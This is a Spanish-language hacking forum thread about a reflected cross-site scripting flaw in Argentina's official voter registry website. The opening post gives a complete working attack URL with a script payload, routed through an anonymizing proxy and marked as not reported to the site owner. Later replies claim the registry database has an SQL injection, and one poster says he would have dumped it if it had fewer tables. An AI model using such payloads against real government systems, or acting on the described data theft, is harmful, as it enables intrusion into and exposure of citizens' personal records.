XSS en el padron electoral de Argentina
(http://img46.imageshack.us/img46/3662/padronelectoral.png)
Reportado: NO
URL: http://anonymouse.org/cgi-bin/anon-www.cgi/http://www.padron.gob.ar/consulta/version_impresa.php?x_mat=111111111&x_ape=%3Cscript%3Ealert%28%27ANTRAX%27%29%3C/script%3E&x_nom=los%20nonamesx_sec=7&x_cir=57&x_dess=LaConChinChina&x_desc=CIUDAD&x_desl=&x_dirl=&x_locl=&x_mes=0&x_det=&x_par=0&x_dis=&x_dom=CalleFalsa%20123&x_pro=&x_tip=DNI-EA&x_padron=&x_orden=
Eso es lo de menos, el problema son los datos expuestos xD
Buen XSS :B
Hablando de datos expuestos...
(http://sphotos-e.ak.fbcdn.net/hphotos-ak-prn2/970248_10201389040233493_441973371_n.jpg)
Wow....buen aporte Antrax!
Con eso se demuestra el riesgo de las Aplicaciones Web.... :)
You are not allowed to view links.
You are not allowed to view links.
Register or Login or You are not allowed to view links.
Register or Login
Hablando de datos expuestos...
(http://sphotos-e.ak.fbcdn.net/hphotos-ak-prn2/970248_10201389040233493_441973371_n.jpg)
Me mato de Gorila antes que planero xD
http://www.idontplaydarts.com/2011/05/exploit-phpcaptcha-securimage/
Mmm, si investigan un poquito mas se van a dar cuenta que estan bastante mas fregados que un XSS en la aplicación :)
Es un desastre... La base de datos del padron de Argentina tiene un SQLi... Lastima que son muchas tablas sino la bajaba ajajaja